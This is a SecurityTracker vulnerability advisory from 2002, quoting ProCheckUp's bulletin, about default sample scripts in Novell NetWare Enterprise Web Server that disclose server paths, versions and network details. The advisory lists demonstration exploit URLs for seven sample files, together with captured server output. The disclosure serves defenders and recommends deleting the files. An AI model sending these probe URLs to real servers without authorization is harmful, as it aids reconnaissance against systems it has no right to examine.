Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Novell NetWare Enterprise Web Server Default Files Disclose Server Information to Remote Users
|
|
SecurityTracker Alert ID: 1004401 |
|
SecurityTracker URL: http://securitytracker.com/id/1004401
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 29 2002
|
Impact:
Disclosure of system information
|
Exploit Included: Yes
|
Version(s): 5.0
|
Description:
An information disclosure vulnerability was reported in some default programs installed with Novell's NetWare Enterprise Web Server. A remote user can gain information about the server, including the physical path of the web root directory and other parameters.
ProCheckUp reported that a remote user can obtain information about the server.
In the default installation, NetWare installs a web server on port 80 and installs several sample files that can be used by a remote user to obtain information. The vulnerable sample files include:
allfield.jse
test.jse
env.pl
lancgi.pl
volscgi.pl
ndslogin.pl
websinfo.bas
A remote user can supply specific URLs invoking these sample files to determine various information about the server.
Some demonstration exploit URLs and the type of information they return are shown below.
1) allfield.jse
URL:
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
Information Returned:
Here are the ScriptEase:WSE input values
_argv[-1] = "SEWSE"
_argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"
Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
Here are the cgi.getVar() values
Here are the Clib.getenv() values
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm
HTTP_ACCEPT_LANGUAGE=en-gb
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
EncExt; T312461; Q312461)
HTTP_HOST=192.168.1.109
HTTP_CONNECTION=Keep-Alive
HTTP_COOKIE=N2S19P61=963269677
ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config
NETSITE_ROOT=/novonyx/suitespot
SERVER_NAMES=lcgi
ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
NS_SESSION=-751448704
NS_REQUEST=-695399320
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
2) test.jse
URL:
http://[server]/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
Information Returned:
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse
NS_SESSION=-798892160
NS_REQUEST=-800372600
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
http://192.168.1.109
3) env.pl
URL:
http://webserver/perl/samples/env.pl
Information Returned:
HSERVER_SOFTWARE Netscape 3.5 for NetWare
GATEWAY_INTERFACE LCGI/1.1
NS_SESSION -707141760
REMOTE_ADDR 192.168.1.250
SERVER_PROTOCOL HTTP/1.1
NS_REQUEST -695399320
PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl
REQUEST_METHOD GET
REMOTE_HOST 192.168.1.250
SERVER_URL http://192.168.1.109
SERVER_NAMES perl
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
EncExt; T312461; Q312461)
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_CONNECTION Keep-Alive
HTTP_ACCEPT_LANGUAGE en-gb
HTTPS OFF
CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/
FN lcgi_map_init
SCRIPT_NAME /perl
HTTP_ACCEPT_ENCODING gzip, deflate
ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config
PERL_ROOT SYS:novonyx/suitespot/docs/perlroot
SERVER_NAME NETWARE.PROCHECKUP.COM
PATH_INFO /samples/env.pl
HTTP_COOKIE N2S19P61=963269677
SERVER_PORT 80
ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
HTTP_HOST 192.168.1.109
PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
NETSITE_ROOT /novonyx/suitespot
4) lancgi.pl
URL:
http://webserver/perl/samples/lancgi.pl
Information Returned:
Description, Address, Media Type, Board Number, Board Instance
Compaq Ethernet or Fast Ethernet NIC 658B50004354 ETHERNET_802.2 1 1
Compaq Ethernet or Fast Ethernet NIC 658B50004354 ETHERNET_II 2 1
5) volscgi.pl
URL:
http://webserver/perl/samples/volscgi.pl
Information Returned: (information about the volumes)
Description, Total Space, Free Space, Block Size, Total Dir
SYS 6065984 5390848 65536 66048
6) ndslogin.pl
URL:
http://webserver/perl/samples/ndslogin.pl
Information Returned:
According to the report, this script appears to allow remote interactive logins with NDS tree viewing:
Fullname: ex: nds:\\novell_tree\novell_context
Username: *
Password:
7) websinfo.bas
URL:
http://webserver/netbasic/websinfo.bas
Information Returned: (information includes the server name and exact netware version running)
Company: Novell
Revision: NetWare 5.00i
Date: 27 March 2000
|
Impact:
A remote user can determine information about the server, including the web root directory location, the exact version number, and data on the volumes and the local network media.
|
Solution:
No solution was available at the time of this entry.
The author of the report recommends removing the default example files.
|
Vendor URL: www.novell.com/ (Links to External Site)
|
Cause:
Access control error, Configuration error
|
Underlying OS:
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 29 May 2002 09:34:40 -0400
Subject: ProCheckUp Security Bulletin PR02-01
|
Vulnerabilities discovered by ProCheckUp
The vulnerabilities detailed below were all discovered using our
revolutionary ProCheckNet technology.
29th May 2002
ProCheckUp Security Bulletin PR02-01
CERT: VU#159203
Description: Netware default programs displays server variables
including web root location.
Date: 8/1/2002
Date Public: 29 May 2002
Application: Netware enterprise web server
Platform: Novell Netware 5.0
Severity: Remote attackers can discover the location of the webroot.
Author: Richard Brain
Vendor Status:
CVE Candidate: Not assigned
Reference: www.procheckup.com/security_info/vuln_pr0201.html
Description:
Netware 5.1 installed with default settings, installs with the Novonyx
webserver. This web server resides on port 80 and comes with sample
files which disclose information.
1) Requesting the following url :-
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
The following information is returned:-
Here are the ScriptEase:WSE input values
_argv[-1] = "SEWSE"
_argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"
Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
Here are the cgi.getVar() values
Here are the Clib.getenv() values
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm
HTTP_ACCEPT_LANGUAGE=en-gb
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
EncExt; T312461; Q312461)
HTTP_HOST=192.168.1.109
HTTP_CONNECTION=Keep-Alive
HTTP_COOKIE=N2S19P61=963269677
ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config
NETSITE_ROOT=/novonyx/suitespot
SERVER_NAMES=lcgi
ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
NS_SESSION=-751448704
NS_REQUEST=-695399320
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
==========================================================
2) ALSO
Requesting the following url :-
http://192.168.1.109/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
The following information is returned:-
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse
NS_SESSION=-798892160
NS_REQUEST=-800372600
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
http://192.168.1.109
3) ALSO
Requests the following url :-
http://webserver/perl/samples/env.pl
The following information is returned:-
HSERVER_SOFTWARE Netscape 3.5 for NetWare
GATEWAY_INTERFACE LCGI/1.1
NS_SESSION -707141760
REMOTE_ADDR 192.168.1.250
SERVER_PROTOCOL HTTP/1.1
NS_REQUEST -695399320
PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl
REQUEST_METHOD GET
REMOTE_HOST 192.168.1.250
SERVER_URL http://192.168.1.109
SERVER_NAMES perl
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
EncExt; T312461; Q312461)
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_CONNECTION Keep-Alive
HTTP_ACCEPT_LANGUAGE en-gb
HTTPS OFF
CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/
FN lcgi_map_init
SCRIPT_NAME /perl
HTTP_ACCEPT_ENCODING gzip, deflate
ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config
PERL_ROOT SYS:novonyx/suitespot/docs/perlroot
SERVER_NAME NETWARE.PROCHECKUP.COM
PATH_INFO /samples/env.pl
HTTP_COOKIE N2S19P61=963269677
SERVER_PORT 80
ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-null
Authorization: NS-value-is-null UserDN: NS-value-is-null
HTTP_HOST 192.168.1.109
PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
NETSITE_ROOT /novonyx/suitespot
Solution/Fix:
Delete all default example programs if not needed.
Legal:
Copyright 2002 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to ProCheckUp, and provided such reproduction and/or distribution is
performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party.
|
|
Go to the Top of This SecurityTracker Archive Page
|
